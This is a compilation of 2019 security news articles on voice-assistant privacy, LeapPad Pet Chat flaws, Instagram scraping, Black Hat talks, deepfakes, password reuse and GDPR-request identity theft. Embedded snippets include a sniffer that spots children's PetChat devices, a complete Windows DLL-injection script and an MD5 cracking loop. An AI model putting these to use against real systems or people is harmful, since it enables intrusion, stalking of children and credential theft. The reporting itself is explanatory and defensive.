STE WILLIAMS

Your Skype Translator calls may be heard by humans

Skype’s voice Translator is marketed by Microsoft in glowing terms as the machine learning (ML) “language translator that keeps getting smarter.”

Its reputation for accurately translating in near real time between ten languages – including English, Spanish, French, German, Mandarin Chinese, Italian, Portuguese, Arabic, and Russian – is strong thanks, it might reasonably be assumed, to all that machine learning going on in the background.

Except that a Motherboard story quoting an unnamed Skype insider has claimed that the reason it’s so good is really because it uses human beings to help the system’s translations along by listening to snippets of real calls.

The problem? While Microsoft makes clear that audio captured using this system might be analysed, it doesn’t make clear that this is being done by people as well as machines.

Machines are just software and in their current state of development are (we hope) unlikely to have any personal opinions on what they listen to. Humans, meanwhile, introduce a very different set of possibilities.

Whoops.

Listening in

Last week, Google and Apple had to suspend contractor access to voice commands captured by Siri and Google Assistant after an outcry at the privacy implications of allowing strangers to listen to recordings of personal audio.

Earlier this week, Amazon found itself “in discussion” with the EU’s Luxembourg privacy regulator over possible privacy implications from access to Alexa voice recordings.

Suddenly, big tech companies are struggling to explain what’s really going on without sounding as if they’re trying to explain away privacy concerns – which simply makes people even more suspicious.

Skype to HAL

While Skype Translator depends on ML for the bulk of its heavy lifting, the algorithms used still need a lot of adjustment to improve their accuracy. Microsoft says as much in its Translator privacy FAQ, describing how:

To help the technology learn and grow, we verify the automatic translations and feed any corrections back into the system, to build more performant services.

Of course, this fails to explain who or what is doing the correcting.

Motherboard says it was sent audio gathered by Translator featuring all sorts of personal content, including people discussing relationships and weight loss.

Other files appeared to suggest that, as with Google, Apple and Amazon, audio from Microsoft’s voice assistant Cortana is also being listened to by contractors.

Not a good few weeks for voice-driven AI then. Machines are being used to do lots of useful and clever things, but machine learning needs to be taught, and that requires teachers. That’s not Microsoft’s fault – but it does show that not everything can be solved by turning on lots of budding HALs and leaving them to it.

Many fret that humans will be replaced by machines. For voice AI, arguably, it’s human indispensability that might be the more immediate challenge.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/nP5shmE4_uY/

Parents, it’s time to delete Pet Chat from your child’s LeapPad

Yet another Internet of Things (IoT) product designed for kids has been shown to be pockmarked with privacy holes.

This time, it’s a tablet called LeapPad Ultimate that security researchers found to have issues that opened the door to creeps tracking children’s physical locations, sending creepster messages to them, or launching man-in-the-middle (MitM) attacks that could have snared sensitive information, including parents’ credit card data.

Scary, but the news has a silver lining: The vendor, LeapFrog, took the issues seriously and jumped on remediation lickety-split. Now all that’s left is for parents to scrape a chat app – Pet Chat – off of older tablets, meaning devices more than three years old. In June 2019, LeapFrog confirmed that it had already removed the app from new tablets being sold in stores.

The news about LeapFrog was released at Black Hat 2019 on Wednesday by the application security testing company Checkmarx.

A rugged little thing… with holes in its shell

As Checkmarx described the tablet in a report issued on Wednesday, the LeapPad is in many ways a perfect first gizmo for kids: it’s rugged, doesn’t require Wi-Fi, and can keep tots entertained in waiting rooms or on long car trips with its kid-friendly educational apps, all without letting the little chicks wander free-range on the savage savannah of the internet.

A Kindle or iPad certainly offers plenty of apps, and even some access restrictions, but generally doesn’t provide the kind of insulation from the internet that many parents want for their young children.

However, after Checkmarx tested the LeapPad Ultimate tablet, it found that the tablet was nonetheless exposing its belly.

The problem: Pet Chat. The app lets users talk to each other in a chat room, using pet avatars and some preset phrases and emoticons. Users can only communicate with those phrases. So where’s the harm in that?

Well, thanks to a directory called Wireless Geographic Logging Engine (WiGLE) – a website that collates wireless hotspots around the world, consolidating location and information into a central database – it’s child’s play to find locations of children using the Pet Chat app. Checkmarx says that’s because Pet Chat creates a Wi-Fi Ad-Hoc connection that broadcasts to other compatible devices nearby using the SSID: PetChat.

Therefore, anybody can identify possible locations of LeapPads via Pet Chat, by finding them on public Wi-Fi or tracking their device’s MAC address.
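
To see how trivial the exposure was, consider this minimal sketch of what anyone in radio range could do: passively listen for 802.11 beacon frames carrying the PetChat network name. It’s an illustration only – the scapy approach and the “wlan0mon” interface name are our assumptions, not Checkmarx’s actual tooling – and it requires a wireless card in monitor mode:

```python
# A minimal sketch, assuming a Linux box with a Wi-Fi card in monitor mode
# ("wlan0mon" is a hypothetical interface name). It passively watches for
# 802.11 beacon frames advertising the "PetChat" SSID Checkmarx described.
from scapy.all import sniff
from scapy.layers.dot11 import Dot11Beacon, Dot11Elt

def spot_petchat(pkt):
    if pkt.haslayer(Dot11Beacon):
        # The first information element in a beacon frame is the SSID.
        ssid = pkt[Dot11Elt].info.decode(errors="ignore")
        if ssid == "PetChat":
            print(f"PetChat beacon from MAC {pkt.addr2}")

sniff(iface="wlan0mon", prn=spot_petchat, store=False)  # requires root
```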

Unfortunately, before LeapFrog leapt on a fix, Pet Chat wasn’t requiring authentication between a parent’s device and a child’s device. Anybody within range – 100 feet – could send a message to a kid’s device.

MitM attacks

Another problem the researchers found was that outgoing traffic from a LeapPad tablet wasn’t encrypted with HTTPS. Instead, the tablets were sending messages in clear-text using the HTTP protocol. That leaves outgoing traffic vulnerable to MitM attacks.

What kind of traffic are we talking about? Highly sensitive data, including:

  • Credit Card info: Brand of the card (Visa, MasterCard, etc.), name on the card, credit card number – missing six digits, expiration date, billing address, and phone number
  • Parent’s info: Email, name, account balance, and address
  • Child’s info: Name, gender, birth year, and birth month

While the credit-card numbers were missing six digits, another security hole meant that attackers could get those digits by setting up a convincing lookalike portal.
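
The cure for the clear-text problem, at least, is standard: send the same traffic over HTTPS with certificate validation switched on, so a network eavesdropper sees only ciphertext. A minimal sketch in Python – the endpoint and payload are hypothetical, since LeapFrog’s real API URLs aren’t public:

```python
import requests

# Hypothetical endpoint and payload, for illustration only - LeapFrog's
# real API URLs aren't public. The point is the scheme: HTTPS, not HTTP.
resp = requests.post(
    "https://api.example.com/v1/account",
    json={"parent_email": "parent@example.com"},
    timeout=10,
    verify=True,  # the default: reject certificates a MitM can't forge
)
resp.raise_for_status()
```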

LeapSearch-portal phishing attacks

Another app on the tablet, a “child-safe” web browser called LeapSearch that only provides access to safe web content, also proved to be vulnerable to MitM attacks. In this case, researchers managed to modify the content of that “safe web” app to create what they called a “phishing version” of the portal.

It looked perfectly legit, but the researchers set it up to ask users for additional information, such as filling in the missing six digits of the credit card on file.

A model of proper response

LeapFrog done good. It responded fully and quickly. Checkmarx sent its full report to the vendor on 29 December 2018, was on a conference call about two weeks later with LeapFrog’s engineers and product managers (who asked the right questions vis-a-vis seeking more details so they could reproduce the issues), and released the first wave of fixes by 1 February 2019.

By 21 April 2019, LeapFrog told Checkmarx that it had also removed “potentially troublesome phrases” from Pet Chat. By 27 June 2019, the problematic Pet Chat app had been removed from tablets in stores.

That kind of response is extremely heartening. There are far too many vendors who make technology that plays fast and loose with children’s privacy, enabling adults to contact kids. Often, they incur massive fines. TikTok comes to mind: the kid-addicting video-sharing app was hit with the biggest-ever fine in the US for violating the nation’s child privacy law. Then, the UK launched its own probe. All of this action came after the Federal Trade Commission noted that TikTok’s parent company was fully aware that “a significant percentage of users were younger than 13” and that it had “received thousands of complaints from parents that their children under 13 had created […] accounts”.

In spite of the complaints, FTC chair Joe Simons said that the company “still failed to seek parental consent before collecting names, email addresses and other personal information from users under the age of 13”.

Unfortunately, TikTok isn’t the only one. There was also My Friend Cayla, a Bluetooth-enabled talking/listening doll that’s gotten into trouble multiple times: Germany’s Bundesnetzagentur, the telecoms watchdog, called Cayla an “illegal espionage apparatus” that parents should destroy. Then, France said the IoT, smart, interactive Cayla was too blabby and eavesdroppy to put under the Christmas tree.

Here’s a wish, Fairy Godmother: try to get all IoT toy vendors to look to LeapFrog and leap to some conclusions about how to listen, and respond promptly, to reports about security holes in their products.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/ejkztteslLE/

Instagram boots ad partner for location tracking and scraping stories

A “preferred Facebook Marketing Partner” has secretly tracked millions of Instagram users’ locations and stories, Business Insider reported on Wednesday.

Facebook has confirmed that San Francisco-based marketing firm HYP3R scraped huge quantities of data from Instagram in order to build detailed user profiles. Profiles that included users’ physical whereabouts, their bios, their interests, and the photos that were supposed to vanish after 24 hours.

It was all done in “clear violation of Instagram’s rules,” BI reports, and Facebook has subsequently kicked HYP3R to the curb: after the publication presented its findings, Instagram issued HYP3R a cease-and-desist letter on Wednesday, booted it off the platform, and tweaked the platform to protect user data.

Here’s the statement that Facebook is sending to media outlets:

HYP3R’s actions were not sanctioned and violate our policies. As a result, we’ve removed them from our platform. We’ve also made a product change that should help prevent other companies from scraping public location pages in this way.

Instagram’s failure to protect location data is a “mystery”

We don’t know exactly how much data HYP3R got at. But as BI notes, the company has publicly bragged about having “a unique dataset of hundreds of millions of the highest value consumers in the world that gives an edge to the leaders in travel and retail.”

According to the publication’s sources, HYP3R sucks in more than 1 million Instagram posts per month, and more than 90% of the data it brags about comes from the platform.

Data scraping is a pervasive problem online, as BI points out. We’ve seen multiple lawsuits, naming big players, brought over the practice. In 2017, for example, a lawsuit was brought against Uber over one of its units – Marketplace Analytics – that allegedly spied on competitors worldwide for years, scraping millions of their records using automated collection systems.

Researchers have done it multiple times to Venmo, to point out how much financial activity users publicly share. A 19-year-old from Nova Scotia got arrested for scraping freedom-of-information releases from a public website.

And Instagram? It’s a data-scraper’s darling.

There was data from 49 million accounts found lying around a few months ago – May 2019. In September 2017, we saw Redditors trying to archive every single Instagram image, be it posted publicly or stored in supposedly locked accounts.

Why? Because they could. Which brings us to HYP3R and how 3asy it was for it to st3al all that data from Fac3book’s Instagram.

BI’s sources include HYP3R insiders who question how much due diligence Instagram and Facebook do on the partners who use their platforms, as well as how well the parent company and its somewhat independently run subsidiary do at safeguarding user data.

BI quoted one such source, a former HYP3R employee:

For [Instagram] to leave these endpoints open and let people get to this in a back channel sort of way, I thought was kind of hypocritical. Why they haven’t [protected user location data, for example] remains a mystery.

Granted, the company only hoovered up public data. But how many users expect their public data to be stitched together with their location data and tied up in a database to be sold off to a marketing company’s clients? These are the unauthorized ways that HYP3R got that data:

  1. An Instagram security lapse allowed it to zero in on specific user locations, like hotels and gyms, and vacuum up all the public posts made from the locations.
  2. It systematically saved users’ public Instagram stories made at those locations. That content, which includes photos shared in the stories, is supposed to disappear after 24 hours. BI calls this a clear violation of Instagram’s terms of service.
  3. It scraped public user profiles to collect information such as user bios and followers, which it then combined with the other location information and data from other sources.

Two tools to find them all, and in the darkness bind them

To get all that, HYP3R created two tools. One was created in the aftermath of Cambridge Analytica, when Instagram began to turn off some of its application programming interface’s (API’s) functionality, including letting developers search for public posts for a given location. HYP3R put a brave face on the deprecation, at least publicly – behind the scenes, it worked to create a way to get at the location data it had been relying on, in spite of Instagram’s having turned off the location data spigot.

The result: a tool that could geofence specific locations and then harvest all public posts tagged with that location on Instagram. Which, in turn, allowed the company to build a database that, in HYP3R’s words, is stuffed with thousands of locations, including …

hotels, casinos, cruise ships, airports, fitness clubs, stadiums and shopping destinations across the globe …

… as well as hospitals, bars, and restaurants, BI reports.
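
The geofencing half of such a tool is conceptually simple. Here’s a minimal sketch, assuming each scraped post carries a latitude/longitude geotag; the venue coordinates and the 150-metre radius are hypothetical:

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points."""
    r = 6371000.0  # mean Earth radius, metres
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(a))

# Hypothetical venue and scraped posts; real coordinates would come from
# the harvested geotags.
venue_lat, venue_lon = 36.1162, -115.1745  # a hotel, say
posts = [
    {"user": "alice", "lat": 36.1165, "lon": -115.1741},
    {"user": "bob",   "lat": 36.2000, "lon": -115.3000},
]

nearby = [p for p in posts
          if haversine_m(venue_lat, venue_lon, p["lat"], p["lon"]) <= 150]
print([p["user"] for p in nearby])  # posts made within 150 m of the venue
```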

The second tool is one that collects ordinary users’ Instagram stories – as in, the posts that are supposed to disappear after 24 hours. They’ve never been available through Instagram’s API, but hey, details, details – HYP3R built a tool to collect them, to save the images for all time, and to scoop up their metadata.

For what?

The purpose of collecting all this data is, of course, to target-market users. And as we’ve seen in other cases of tracking via location data, the targeting can be unnerving and invasive. It brings to mind the New York Times article from December 2018, in which the newspaper found that supposedly “trusted” apps such as GasBuddy and The Weather Channel were among at least 75 companies getting purportedly “anonymous” but pinpoint-precise location data from about 200 million smartphones across the US.

They were sharing or selling it to advertisers, retailers or even hedge funds seeking valuable insights into consumer behavior. One example: Tell All Digital, a Long Island advertising firm, buys location data, then uses it to run ad campaigns for personal injury lawyers that it markets to people who wind up in emergency rooms.

Similarly, BI asks us to imagine that an Instagram user goes on vacation, then visits a selection of locations and businesses. The Instagram story that the user posts references all those locations. Sure, it was intended to vanish after 24 hours, but instead, in the hands of a data harvester like HYP3R, it gets made into this kind of Big Data nightmare of a voyeuristic, overly intimate story – one that it keeps forever:

Imagine visiting a new city and sharing a geotagged story with friends of the hotel you visited. By itself, it doesn’t tell viewers much about you.

But combine it with the story you posted from the hospital you visited for a checkup, and the selfie you made the next day at a sports stadium, and the story from the vegetarian restaurant you ate at, and so on, and an intimate picture of your life and interests begins to emerge over weeks and months.

Make it stop

HYP3R disputes the notion that it violated Instagram’s terms of service and data policies, citing the fact that it’s only been collecting publicly shared data. Instagram said that HYP3R has, in fact, violated its rules on automated data collection.

These are the changes that Instagram is making due to the unauthorized data abuse:

  • It’s working on preventing logged-out users from getting at public location pages – something that’s been possible because of a publicly available JSON package that bundled up data into an easy-to-access format and which was available by simply appending a short string of characters to any Instagram URL.
  • Instagram revoked HYP3R’s access to its APIs and removed it from the list of Facebook Marketing Partners. Until Wednesday, you could find HYP3R on that directory, which is a curated list of companies that Facebook recommends for various tasks and services – such as planning, execution and measurement – for advertisers.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/tYg0EOUDhS8/

Pwn an iPhone to bank $1m, Check Point gripes about WhatsApp privacy again, Broadcom eats Symantec enterprise biz

Black Hat Here’s a quick summary of some important infosec happenings from inside and outside the Black Hat USA conference in Las Vegas on Thursday.

Apple embiggens bug-bounty program

Apple’s security engineering boss Ivan Krstić told Black Hat attendees that Cupertino is expanding its bug-bounty program in various ways. For instance, it will now cover macOS, WatchOS, and Apple TV, whereas previously it was only interested in coughing up cash for details of iOS vulnerabilities.

All researchers can now, in theory, take part, too, rather than a select elite few. And the maximum payout for an exploit chain that can achieve a total and automatic iPhone takeover – no user interaction required, kernel-level, and persistent, and requiring just a victim’s cellphone number – will be upped to $1m from $200,000. There’s also $500,000 awaiting you if you can pwn an iPhone over the network without any user interaction.

Developer-mode iPhones that grant access to the firmware and operating system, to make finding low-level holes easier, will be given to selected infosec gurus to probe. There will also be a 50 per cent bonus on bounties for bugs reported in pre-release software before it is unleashed on the public.

Check Point continues beef with WhatsApp

Around this time last year, Check Point revealed it was possible to slyly manipulate messages in private and group WhatsApp conversations. At the time, the chat app’s maker Facebook didn’t think it was too big a deal, and it still doesn’t: according to Check Point’s reps at Black Hat this Thursday, the weaknesses remain largely unfixed.

One weakness – a miscreant could send a private message to a group chat participant that, confusingly, appeared as a public message – was addressed by WhatsApp, we’re told. However, Check Point claimed this week it “found that it is still possible to manipulate quoted messages and spread misinformation from what appear to be trusted sources.”

Basically, it’s possible to tamper with quoted messages in replies, which could trick people into thinking the quoted person sent a text they didn’t actually send.

Facebook’s having none of it, though. In a statement to the media, the antisocial network said: “It is false to suggest there is a vulnerability with the security we provide on WhatsApp.

“The scenario described here is merely the mobile equivalent of altering replies in an email thread to make it look like something a person didn’t write.”

Windows process injection research

Eggheads at infosec biz SafeBreach claim they have unearthed at least 20 ways miscreants on a computer can inject malicious code into legit processes on Windows to further compromise the box. That’s up from the six or seven methods most white and black hats seem to be aware of for Microsoft’s operating system.

These so-called process injection attacks are useful for commandeering privileged applications, and transforming them into powerful malware that can snoop on users and steal data. It’s also a neat way to evade antivirus tools because the victim process is typically trusted and is not expected to turn rogue.

“It allows the malware to establish a long-term presence in the target machine while reducing the likelihood of getting detected or quarantined,” is how Amit Klein, veep of security research at SafeBreach, put it to The Register. He spoke to us ahead of his talk with Itzik Kotler at this week’s Black Hat conference in Las Vegas. The pair are due to give the same talk at DEF CON in Sin City on Friday.

“If the malware can move to an Office or system or mail process, any process that is benign, that is well-known or signed, then the malware stands a much better chance of propagating,” Klein continued.

The hope is that, by understanding and documenting how different process injection attacks work – the techniques were gleaned from all sorts of sources, including proof-of-concept code – antivirus makers will be better able to spot process injection as it happens, while developers will be better able to harden applications and take measures to keep malware from altering their processes.
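
For context, the long-known baseline those 20 techniques improve on is the textbook CreateRemoteThread/LoadLibraryA DLL injection, sketched below. It’s Windows-only, the target PID and DLL path are hypothetical, and the call chain shown is exactly the pattern antivirus heuristics already watch for – which is why the newer, subtler variants matter:

```python
# Windows-only sketch of textbook CreateRemoteThread/LoadLibraryA injection.
# Target PID and DLL path are hypothetical; needs rights over the target.
import ctypes
from ctypes import wintypes

k32 = ctypes.WinDLL("kernel32", use_last_error=True)
k32.OpenProcess.restype = wintypes.HANDLE
k32.VirtualAllocEx.restype = ctypes.c_void_p
k32.VirtualAllocEx.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                               ctypes.c_size_t, wintypes.DWORD, wintypes.DWORD)
k32.WriteProcessMemory.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                                   ctypes.c_char_p, ctypes.c_size_t,
                                   ctypes.c_void_p)
k32.GetModuleHandleA.restype = wintypes.HMODULE
k32.GetProcAddress.restype = ctypes.c_void_p
k32.GetProcAddress.argtypes = (wintypes.HMODULE, ctypes.c_char_p)
k32.CreateRemoteThread.argtypes = (wintypes.HANDLE, ctypes.c_void_p,
                                   ctypes.c_size_t, ctypes.c_void_p,
                                   ctypes.c_void_p, wintypes.DWORD,
                                   ctypes.c_void_p)

PROCESS_ALL_ACCESS = 0x001F0FFF
MEM_COMMIT_RESERVE, PAGE_READWRITE = 0x3000, 0x04

pid = 1234                      # hypothetical victim process
dll = b"C:\\temp\\example.dll"  # hypothetical DLL to load into it

proc = k32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
# 1. Allocate memory in the target and copy the DLL path into it.
remote = k32.VirtualAllocEx(proc, None, len(dll) + 1,
                            MEM_COMMIT_RESERVE, PAGE_READWRITE)
k32.WriteProcessMemory(proc, remote, dll, len(dll) + 1, None)
# 2. LoadLibraryA has the same shape as a thread-start routine, so a remote
#    thread pointed at it makes the *target* process load the DLL. This
#    OpenProcess -> WriteProcessMemory -> CreateRemoteThread chain is the
#    very pattern endpoint defences look for.
loadlib = k32.GetProcAddress(k32.GetModuleHandleA(b"kernel32.dll"),
                             b"LoadLibraryA")
k32.CreateRemoteThread(proc, None, 0, loadlib, remote, 0, None)
```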

And finally…

As rumored for a while now, Broadcom has finally acquired Symantec’s enterprise business for $11bn in cash. Our full report is here. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/black_hat_roundup/

Who will save us from deepfakes? Other AIs? Humans? What about vastly hyperintelligent pandimensional beings?

Black Hat Deepfakes, the AI-generated talking heads that can say whatever their creator wants them to, are getting harder to detect. But boffins have enlisted an unlikely ally in the quest for truth – mice.

In a presentation at the Black Hat security conference in Las Vegas, data scientists examined various ways to identify deepfake videos – something that is going to become increasingly important as US elections approach in 2020.

George Williams, director of data science at GSI, explained that AIs are better at spotting deepfakes than fleshbags. Earlier this year, humans were pitted against a generative adversarial network (GAN) to call out a selection of deepfakes, and the carbon-based humanoids did pretty well, spotting 88 per cent of fakes. But the machines managed an average rate of 92 per cent.

“That seems pretty good, but when you consider the sheer volume of content that can be put out on social media, you’re going to see a lot of mistakes and false positives,” he said. “Some of the content will get past both humans and machines.”

One solution is to build bigger and better AI systems, said Alexander Comerford, a data science software engineer at Bloomberg LP. And the flood of deepfakes might not be so bad – at first.

“Doing deepfakes is really hard, the infamous Obama one took 17 hours of presidential addresses footage to create,” Comerford said. “If you’re not a public figure, 17 hours is a lot of data to find. It also took two weeks to train on CPU or two hours on a GPU, and we don’t know how long the final touches on the teeth and other features [took].”

More advanced GANs can be created to deal with deepfakes, but they still fall short, because AI systems have trouble with the pitch and tone of human voices. The frequency of voices might be one route forward – the letters b and v sound similar but sit on completely different frequencies.
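
To make the frequency idea concrete, here’s a minimal sketch of one such cue – the spectral centroid of each audio frame, a power-weighted mean frequency that lands in different bands for sounds like /b/ and /v/. The filename is hypothetical and the audio is assumed to be mono:

```python
# Sketch: compute a spectrogram and a per-frame spectral centroid, the kind
# of frequency cue described above. "sample.wav" is a hypothetical mono file.
import numpy as np
from scipy.io import wavfile
from scipy.signal import spectrogram

rate, audio = wavfile.read("sample.wav")
freqs, times, power = spectrogram(audio.astype(np.float64), fs=rate)

# Spectral centroid per frame: the power-weighted mean frequency.
centroid = (freqs[:, None] * power).sum(axis=0) / (power.sum(axis=0) + 1e-12)
print(f"mean spectral centroid: {centroid.mean():.0f} Hz")
```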


But there are other biological systems that could do better. Jonathan Saunders, a graduate student at the University of Oregon, explained that mice are actually pretty good at spotting human voices and can be trained to do so.

The team trained mice to recognise human speech and got a 75 per cent detection rate for a human using simple speech. That dropped to 65 per cent for complex vocabulary but, by monitoring the neural pattern in a mouse’s head, the team reckons this could be an important tool in helping to train AI systems to get better at spotting a fake video.

“We think it’s time to use auditory systems, so we should train mice to detect fake and real speech,” he said. “People are good at spotting fakes but it’s going to be a cat-and-mouse game.” [Cue muffled groans from the audience.]

You can read the full research here [PDF]. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/deepfakes_mice/

It’s (Still) the Password, Stupid!

The best way to protect your identity in cyberspace is the simplest: Use a variety of strong passwords, and never, ever, use “123456” no matter how easy it is to type.

Stop me if you’ve heard this one before. Last year, billions of credentials were exposed due to thousands of data breaches. Many of the companies that were hacked didn’t tell anyone until months after the fact, and the most common password exposed during these breaches was … 123456.

I know, right? Same old story.

At this point, I’d love to tell you that there was something new and exciting about these breaches. In some ways, there is: The poor security used by many large companies is under greater scrutiny than ever before. But in other ways, these exposures reinforce the importance of the advice that’s been around for years: Choose a strong password and, where you can, don’t use a password at all.

The most succinct summary of the scale of data breaches in 2018 comes courtesy of SpyCloud, a firm specializing in security analysis and anti-account takeover solutions. It reports that in 2018 it was able to recover 3.5 billion credentials from 2,882 breached sources and managed to decrypt 87% of the passwords contained in this data.

A deeper analysis reveals more troubling factors. One is that it’s not clear that many of the “data breaches” reported in the press last year were data breaches at all. In some cases, companies merely released data that they had permission to release — for example, Facebook’s controversial “research project,” reported by TechCrunch, that involved releasing a data-mining app (subsequently blocked) to consumers that was intended for internal corporate use under Apple’s licensing agreement. The second worrying issue is the ongoing prevalence of email scams, which still account for the vast majority of hacks and for which a worrying number of people still fall.

And then we come to companies’ responses to these breaches. MyFitnessPal, owned by Under Armour, unintentionally shared the credentials of at least 150 million users in a much-publicized hack, but one that only came to light weeks after it had happened. Quora, in a similar attack, had 100 million user names, passwords, and other data stolen.

Now, you might think that MyFitnessPal and Quora are hardly the most important accounts in your life, and that’s true. Neither carries detailed financial information or personal photographs. The problem is that too many people use the same password for these apps as they do for all of their online accounts, and so a breach of even a “low-level” account can have huge consequences both in yielding access to other accounts and driving customers away from the affected company for good.

Password Hashing
It’s also worth looking at how passwords and other information were extracted from the data stolen from Quora and MyFitnessPal.

The stolen data was hashed, as well it should be. Instead of a plaintext password, the breached information contained hashes of passwords. These are codes generated from passwords by a one-way hashing algorithm, and many companies (including these two, it turns out) think that this makes them secure.

It doesn’t. Or, rather, it would if they were using quality algorithms. Unfortunately, the hashing algorithms used by the two companies – MD5 and SHA-1, respectively – are now pretty easy for cybercriminals to overcome. There are even free pieces of software that will do this for them.
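
To see just how little protection an unsalted, fast hash offers, consider this minimal sketch – the hash below genuinely is the MD5 of “123456” – followed by the salted, deliberately slow alternative sites should use instead:

```python
import hashlib
import os

# Dictionary attack on an unsalted MD5 hash, the kind of "protection" at
# issue here. The hash below really is md5("123456").
leaked_hash = "e10adc3949ba59abbe56e057f20f883e"
for guess in ["password", "qwerty", "iloveyou", "123456"]:
    if hashlib.md5(guess.encode()).hexdigest() == leaked_hash:
        print(f"cracked almost instantly: {guess}")
        break

# What a site should store instead: a salted, deliberately slow key
# derivation function, so each guess costs the attacker real CPU time.
salt = os.urandom(16)
stored = salt + hashlib.pbkdf2_hmac("sha256", b"123456", salt, 600_000)
```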

So, the companies involved in these hacks were certainly at fault, but only partially. A closer look at the data in the breaches also reveals that poor security practices on the part of users made the hackers’ job a lot easier.

Password Reuse
To see why that is, it’s worth looking at the most common passwords that were exposed during these breaches.

Here they are: 123456, 123456789, password, qwerty, 12345, qwerty123, 1q2w3e, 123123, 111111, 12345678, 1234567, 1234567890, abc123, anhyeuem, iloveyou, password1, 123456789, 123321, qwertyuiop, 654321, 123456, 121212, asdasd, 666666, zxcvbnm, 987654321, 112233, 123456a, 123123123, 123qwe, 11111111, aaaaaa, qwe123, dragon, 1234, 1q2w3e4r5t, reset, zinch, 25251325, monkey, a123456, 1qaz2wsx, 1q2w3e4r, 123654, 159753, 222222, asdfghjkl, 147258369, 999999, 5201314, 123abc, qweqwe, 456789, 555555, 7777777, qazwsx, princess, qwerty1, 1111111, football, j38ifUbn, asdfgh, 66bob, 888888, 163.com, 147258, asd123, azerty, sunshine, 789456, 3rJs1la7qE, 159357, michael, 789456123, 88888888, 1234qwer, daniel, Password, abcd1234, myspace1, computer, 987654321, shadow, qqqqqq, 1234561, killer, superman, pokemon, 987654, master, q1w2e3r4t5y6, baseball, 777777, 123456789a, charlie, 11223344, 333333, soccer, x4ivygA51F

It gets even worse when you realize that the kind of person who uses 123456 as a password is probably using this password for all of their online accounts.

And so the issue is not that someone gets access to a Quora account. It’s that password reuse is still common practice despite the penetration of password management software into the mainstream, nearly all of which uses AES 256-bit encryption. The best advice, besides letting your computer do the managing for you, is to use a variety of strong passwords and never, ever, use 123456, no matter how easy it is to type.
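
One practical way to follow that advice is to screen candidate passwords against Have I Been Pwned’s range API, which uses k-anonymity: you send only the first five characters of the password’s SHA-1 hash, so the password itself never leaves your machine. A minimal sketch:

```python
import hashlib
import requests

def pwned_count(password: str) -> int:
    """Times a password appears in known breaches, via HIBP's range API."""
    sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}",
                        timeout=10)
    resp.raise_for_status()
    # The response lists hash suffixes and breach counts, one per line.
    for line in resp.text.splitlines():
        tail, _, count = line.partition(":")
        if tail == suffix:
            return int(count)
    return 0

print(pwned_count("123456"))  # tens of millions of hits
```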


Sam Bocetta is a freelance journalist specializing in U.S. diplomacy and national security, with emphases on technology trends in cyber warfare, cyber defense, and cryptography. Previously, Sam was a defense contractor. He worked in close partnership with architects and … View Full Bio

Article source: https://www.darkreading.com/endpoint/its-(still)-the-password-stupid!/a/d-id/1335430?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Talk about unintended consequences: GDPR is an identity thief’s dream ticket to Europeans’ data

Black Hat When Europe introduced the General Data Protection Regulation (GDPR) it was supposed to be a major step forward in data safety, but sloppy implementation and a little social engineering can make it heaven for identity thieves.

In a presentation at the Black Hat security conference in Las Vegas James Pavur, a PhD student at Oxford University who usually specialises in satellite hacking, explained how he was able to game the GDPR system to get all kinds of useful information on his fiancée, including credit card and social security numbers, passwords, and even her mother’s maiden name.

“Privacy laws, like any other infosecurity control, have exploitable vulnerabilities,” he said. “If we’d look at these vulnerabilities before the law was enacted, we could pick up on them.”

Pavur’s research started in an unlikely place – the departure lounge of a Polish airport. After the flight he and his fiancée were supposed to travel on was delayed, they joked about spamming the airline with GDPR requests to get revenge. They didn’t, but it sparked an idea to see what information you could get on other people and Pavur’s partner agreed to act as a guinea pig for the experiment.

For social engineering purposes, GDPR has a number of real benefits, Pavur said. Firstly, companies only have a month to reply to requests and face fines of up to 4 per cent of revenues if they don’t comply, so fear of failure and time are strong motivating factors.

In addition, the type of people who handle GDPR requests are usually admin or legal staff, not security people used to social engineering tactics. This makes information gathering much easier.

Over the space of two months Pavur sent out 150 GDPR requests in his fiancée’s name, asking for all and any data on her. In all, 72 per cent of companies replied back, and 83 companies said that they had information on her.

Interestingly, 5 per cent of responses, mainly from large US companies, said that they weren’t liable to GDPR rules. They might be in for a rude shock if that comes before the courts.

Of the responses, 24 per cent simply accepted an email address and phone number as proof of identity and sent over any files they had on his fiancée. A further 16 per cent requested easily forged ID information and 3 per cent took the rather extreme step of simply deleting her accounts.

A lot of companies asked for her account login details as proof of identity, which is actually a pretty good idea, Pavur opined. But when one gaming company tried it, he simply said he’d forgotten the login and they sent it anyway.

The range of information the companies sent in is disturbing. An educational software company sent Pavur his fiancée’s social security number, date of birth and her mother’s maiden name. Another firm sent over 10 digits of her credit card number, the expiration date, card type and her postcode.

A threat intelligence company – not Have I been Pwned – sent over a list of her email addresses and passwords which had already been compromised in attacks. Several of these still worked on some accounts – Pavur said he has now set her up with a password manager to avoid repetition of this.


“An organisation she had never heard of, and never interacted with, had some of the most sensitive data about her,” he said. “GDPR provided a pretext for anyone in the world to collect that information.”

Fixing this issue is going to take action from both legislators and companies, Pavur said.

First off, lawmakers need to set a standard for what is a legitimate form of ID for GDPR requests. One rail company was happy to send out personal information, accepting a used envelope addressed to the fiancée as proof of identity.

He suggested requesting account login details was a good idea, but there’s always the possibility that such accounts have been pwned. A driver’s licence would also be a good alternative, although fake IDs are rife.

Companies should be prepared to refuse information requests unless proper proof is provided, he suggested. It may come to a court case, but being seen to protect the data of customers would be no bad thing. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/gdpr_identity_thief/

You can easily secure America’s e-voting systems tomorrow. Use paper – Bruce Schneier

